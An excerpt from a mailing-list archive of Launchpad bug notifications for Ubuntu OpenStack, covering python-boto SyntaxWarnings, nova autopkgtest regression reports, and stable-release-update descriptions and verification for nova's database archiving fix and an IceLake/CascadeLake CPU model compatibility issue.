invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:348: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value.id) /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:363: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value) 
/usr/lib/python3/dist-packages/boto/sdb/db/property.py:265: SyntaxWarning: invalid escape sequence '\/' validate_regex = "^s3:\/\/([^\/]*)\/(.*)$" ** Affects: python-boto (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to python-boto in Ubuntu. https://bugs.launchpad.net/bugs/2075551 Title: SyntaxWarning messages on python3-boto install Status in python-boto package in Ubuntu: New To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/python-boto/+bug/2075551/+subscriptions From 2048517 at bugs.launchpad.net Thu Aug 1 23:28:43 2024 From: 2048517 at bugs.launchpad.net (Ubuntu SRU Bot) Date: Thu, 01 Aug 2024 23:28:43 -0000 Subject: [Bug 2048517] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12) References: <170470935000.2322881.14682222740716386457.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <20240801232843.79E9AFC051@ubuntu-archive-toolbox.internal> All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. 
The following regressions have been reported in tests triggered by the package: ceilometer/1:14.1.0-0ubuntu1 (amd64, ppc64el, s390x) nova/2:21.2.4-0ubuntu2.12 (amd64, arm64, armhf, ppc64el, s390x) Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1]. https://people.canonical.com/~ubuntu-archive/proposed-migration/focal/update_excuses.html#nova [1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions Thank you! -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2048517 Title: EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU Status in nova package in Ubuntu: Fix Released Status in qemu package in Ubuntu: Invalid Status in nova source package in Focal: Fix Committed Status in qemu source package in Focal: Invalid To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/2048517/+subscriptions From 2024258 at bugs.launchpad.net Thu Aug 1 23:28:43 2024 From: 2024258 at bugs.launchpad.net (Ubuntu SRU Bot) Date: Thu, 01 Aug 2024 23:28:43 -0000 Subject: [Bug 2024258] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12) References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <20240801232843.2E868FC037@ubuntu-archive-toolbox.internal> All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. 
https://bugs.launchpad.net/bugs/2024258

Title:
  Performance degradation archiving DB with large numbers of FK related records

Status in OpenStack Compute (nova): Fix Released
Status in OpenStack Compute (nova) antelope series: In Progress
Status in OpenStack Compute (nova) wallaby series: In Progress
Status in OpenStack Compute (nova) xena series: In Progress
Status in OpenStack Compute (nova) yoga series: In Progress
Status in OpenStack Compute (nova) zed series: In Progress
Status in nova package in Ubuntu: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

Bug description:

  [Impact]

  Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate.

  Additionally, this behavior can cause the cleanup process to frequently encounter the following error:

  oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.")

  The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB.

  [Fix]

  An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit.
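The before/after difference in the [Fix] section can be illustrated with a toy schema. The sketch below is hypothetical (invented table names, sqlite3 standing in for MySQL; it is not nova's real archive code): it commits one parent row plus its child rows per transaction, so the size of each commit stays bounded regardless of how large max_rows is.

```python
import sqlite3

def archive_one_tree(conn, instance_id):
    """Move one deleted parent row and its child rows to the shadow
    tables in a single small transaction (the 'with' block)."""
    with conn:  # each 'with conn' block is one committed transaction
        conn.execute("INSERT INTO shadow_faults SELECT * FROM faults "
                     "WHERE instance_id = ?", (instance_id,))
        conn.execute("DELETE FROM faults WHERE instance_id = ?", (instance_id,))
        conn.execute("INSERT INTO shadow_instances SELECT * FROM instances "
                     "WHERE id = ?", (instance_id,))
        conn.execute("DELETE FROM instances WHERE id = ?", (instance_id,))

def archive_deleted_rows(conn, max_rows):
    """Archive up to max_rows parent 'trees', one transaction each,
    instead of batching them all into one big transaction."""
    archived = 0
    while archived < max_rows:
        row = conn.execute("SELECT id FROM instances "
                           "WHERE deleted_at IS NOT NULL LIMIT 1").fetchone()
        if row is None:
            break
        archive_one_tree(conn, row[0])
        archived += 1
    return archived

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE instances (id INTEGER PRIMARY KEY, deleted_at TEXT);
    CREATE TABLE faults (instance_id INTEGER);
    CREATE TABLE shadow_instances (id INTEGER PRIMARY KEY, deleted_at TEXT);
    CREATE TABLE shadow_faults (instance_id INTEGER);
    INSERT INTO instances VALUES (1, '2023-06-20 20:04:46'), (2, NULL);
    INSERT INTO faults VALUES (1), (1);
""")
print(archive_deleted_rows(conn, max_rows=1000))  # archives only instance 1
```

Even with max_rows=1000, each transaction here touches one instance and its faults, which is how the fix keeps commits under limits like the ~143MB group replication transaction size cap.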
commit 697fa3c000696da559e52b664c04cbd8d261c037
Author: melanie witt
CommitDate: Tue Jun 20 20:04:46 2023 +0000

    database: Archive parent and child rows "trees" one at a time

[Test Plan]

1. Create an instance and delete it in OpenStack.
2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL.
   select display_name, deleted_at from instances where deleted_at <> 0;
3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value:
   nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete
4. Log in to the Nova database again and confirm that the entry has been archived and removed.
   select display_name, deleted_at from instances where deleted_at <> 0;

[Where problems could occur]

The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities.

[1] https://bugs.mysql.com/bug.php?id=84785

[Original Bug Description]

Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows.

Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g.
500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions

From 1999814 at bugs.launchpad.net Thu Aug 1 23:28:43 2024
From: 1999814 at bugs.launchpad.net (Ubuntu SRU Bot)
Date: Thu, 01 Aug 2024 23:28:43 -0000
Subject: [Bug 1999814] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12)
References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com>
Message-ID: <20240801232843.8D137100CF8@ubuntu-archive-toolbox.internal>

All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. The following regressions have been reported in tests triggered by the package:

ceilometer/1:14.1.0-0ubuntu1 (amd64, ppc64el, s390x)
nova/2:21.2.4-0ubuntu2.12 (amd64, arm64, armhf, ppc64el, s390x)

Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1].

https://people.canonical.com/~ubuntu-archive/proposed-migration/focal/update_excuses.html#nova

[1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions

Thank you!

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/1999814

Title:
  [SRU] Allow for specifying common baseline CPU model with disabled feature

Status in OpenStack Compute (nova): Expired
Status in OpenStack Compute (nova) ussuri series: New
Status in OpenStack Compute (nova) victoria series: Won't Fix
Status in OpenStack Compute (nova) wallaby series: Won't Fix
Status in OpenStack Compute (nova) xena series: Won't Fix
Status in OpenStack Compute (nova) yoga series: New
Status in nova package in Ubuntu: Fix Released
Status in nova source package in Bionic: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

Bug description:

  ******** SRU TEMPLATE AT THE BOTTOM *******

  Hello,

  This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu-flags), but there is a very different and important nuance.

  A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server-noTSX model.

  The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs.
Even if I specify the following in my nova.conf:

[libvirt]
cpu_mode = custom
cpu_model = Cascadelake-Server-noTSX
cpu_model_extra_flags = -mpx

That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function:

2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._compare_cpu(cpu, self._get_cpu_info(), None)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility.
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred:
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     service.start()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.manager.init_host()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.driver.init_host(host=self.host)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._check_cpu_compatibility()
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(msg)
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with
host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service

If I make a custom libvirt CPU map file which removes the "" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this.

Currently the only "proper" way I'm aware of to work around this is to fall back to a Broadwell-based configuration, which lacks the "mpx" feature, as a common baseline; but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common to both Cascade Lake and Ice Lake. I would prefer a way to use the Cascade Lake settings but simply remove that "mpx" feature from use.

----

Steps to reproduce
==================

On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in nova.conf in the libvirt section:

[libvirt]
cpu_mode = custom
cpu_model = Cascadelake-Server-noTSX
cpu_model_extra_flags = -mpx

Then try to start nova.

Expected result
===============

Nova should start since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server-noTSX as a common baseline model for both Cascade Lake and Ice Lake servers.
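The "common baseline" reasoning above reduces to a set comparison. The sketch below is illustrative only: the feature sets are abbreviated, hypothetical stand-ins, not the real libvirt CPU maps. It shows why the Cascadelake model only becomes a valid baseline for an MPX-less Ice Lake host once a '-mpx' override is applied.

```python
# Abbreviated, hypothetical feature sets -- NOT the real libvirt CPU maps.
CASCADELAKE_NOTSX = {"avx512f", "avx512vnni", "pku", "mpx"}
ICELAKE_HOST_FEATURES = {"avx512f", "avx512vnni", "pku", "gfni"}  # no mpx

def effective_features(model_features, extra_flags):
    """Apply '+flag'/'-flag' overrides to a model's feature set."""
    features = set(model_features)
    for flag in extra_flags:
        if flag.startswith('-'):
            features.discard(flag[1:])
        elif flag.startswith('+'):
            features.add(flag[1:])
    return features

# Plain Cascadelake-Server-noTSX is not a subset of the host: mpx is missing.
print(CASCADELAKE_NOTSX <= ICELAKE_HOST_FEATURES)  # False

# With '-mpx' applied, it becomes a usable common baseline for both families.
print(effective_features(CASCADELAKE_NOTSX, ["-mpx"]) <= ICELAKE_HOST_FEATURES)  # True
```

The bug is essentially that nova's pre-fix startup check rejected the model name before this post-override subset comparison could ever succeed.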
Actual result
=============

Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help.

Environment
===========

Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2.
Hypervisor: libvirt + KVM

Other relevant notes
====================

There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily about the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well.

* https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead, as it seems to more correctly identify the CPU model even if there are disabled flags like MPX.

* https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu.

===============
SRU Description
===============

[Impact]

When using IceLake CPUs alongside CascadeLake CPUs, nova-compute does not start because of its CPU model comparison; it fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features.
The Libvirt upstream team will not add specific support for IceLake [1]. The fix [2] in Nova is to skip the CPU check (as a configurable workaround) and let libvirt handle the added/removed flags, which is assumed to work for this specific case.

[Test case]

Since we do not have IceLake and CascadeLake CPUs in our usual lab for testing this specific scenario, the test case could be either:

1) Run the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expect the tests to pass. Test run evidence will be attached to LP.

2) Manually deploy nova and the necessary OpenStack services to get Nova to the code point of validating the issue on a single node. I already achieved this and was able to test the fix by hacking the nova code to bypass the need for other services (conductor, keystone, mysql, etc.), but for a proper validation a clean installation (without any hackery) is considered mandatory. In that case, the test case would be:

a) Deploy nova and required services on an IceLake machine
b) Make sure the nova.conf has:
   cpu_mode = custom
   cpu_models = Cascadelake-Server-noTSX
   cpu_model_extra_flags = -mpx
c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, instead presenting the error:

2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.

d) Install the package containing the fix and confirm a successful nova-compute service restart, no longer containing the error and containing this instead:

2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX

[Regression Potential]

There is 1 new behavior introduced and 1 changed.
The behavior introduced is gated by a new config option that needs to be enabled; when enabled, it skips running the check. The behavior changed is the one assumed by the default (disabled) value of the config option. The code being backported to Yoga through Ussuri is exactly the same as currently in master (Caracal+), which means no issues have been found with it across 4 releases, giving some confidence that the change is unlikely to cause issues.

[Other Info]

[1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064
[2] https://review.opendev.org/c/openstack/nova/+/871969

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions

From 2024258 at bugs.launchpad.net Fri Aug 2 08:18:34 2024
From: 2024258 at bugs.launchpad.net (Chengen Du)
Date: Fri, 02 Aug 2024 08:18:34 -0000
Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records
References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4>
Message-ID: <172258671500.2196669.11132417503309717563.malone@juju-98d295-prod-launchpad-3>

The nova package in jammy-proposed has been tested according to the [Test Plan]. The test results met our expectations.
ubuntu at juju-7d3324-openstack-jammy-7:~$ apt policy nova-common
nova-common:
  Installed: 3:25.2.1-0ubuntu2.7
  Candidate: 3:25.2.1-0ubuntu2.7
  Version table:
 *** 3:25.2.1-0ubuntu2.7 500
        500 http://archive.ubuntu.com/ubuntu jammy-proposed/main amd64 Packages
        100 /var/lib/dpkg/status
     3:25.2.1-0ubuntu2.6 500
        500 http://availability-zone-2.clouds.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages
     3:25.0.0-0ubuntu1 500
        500 http://availability-zone-2.clouds.archive.ubuntu.com/ubuntu jammy/main amd64 Packages

** Tags removed: verification-needed-jammy
** Tags added: verification-done-jammy

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/2024258

Title:
  Performance degradation archiving DB with large numbers of FK related records

Status in OpenStack Compute (nova): Fix Released
Status in OpenStack Compute (nova) antelope series: In Progress
Status in OpenStack Compute (nova) wallaby series: In Progress
Status in OpenStack Compute (nova) xena series: In Progress
Status in OpenStack Compute (nova) yoga series: In Progress
Status in OpenStack Compute (nova) zed series: In Progress
Status in nova package in Ubuntu: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions

From 2024258 at bugs.launchpad.net Fri Aug 2 08:33:30 2024
From: 2024258 at bugs.launchpad.net (Chengen Du)
Date: Fri, 02 Aug 2024 08:33:30 -0000
Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records
References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4>
Message-ID: <172258761032.2223934.14564219984269660929.malone@juju-98d295-prod-launchpad-3>

@mfo @slyon
I apologize for the indentation issue in the focal patch. I may have inadvertently modified the patches after testing them. The issue originates from nova/tests/functional/db/test_archive.py, where the test_archive_deleted_rows_parent_child_trees_one_at_time function is not indented correctly.
Could you please confirm if I need to upload a new patch to fix this?
I apologize again for increasing your workload.

** Tags removed: verification-needed verification-needed-focal
** Tags added: verification-failed-focal

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu.
https://bugs.launchpad.net/bugs/2024258

Title:
  Performance degradation archiving DB with large numbers of FK related records

Status in OpenStack Compute (nova): Fix Released
Status in OpenStack Compute (nova) antelope series: In Progress
Status in OpenStack Compute (nova) wallaby series: In Progress
Status in OpenStack Compute (nova) xena series: In Progress
Status in OpenStack Compute (nova) yoga series: In Progress
Status in OpenStack Compute (nova) zed series: In Progress
Status in nova package in Ubuntu: Won't Fix
Status in nova source package in Focal: Fix Committed
Status in nova source package in Jammy: Fix Committed

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions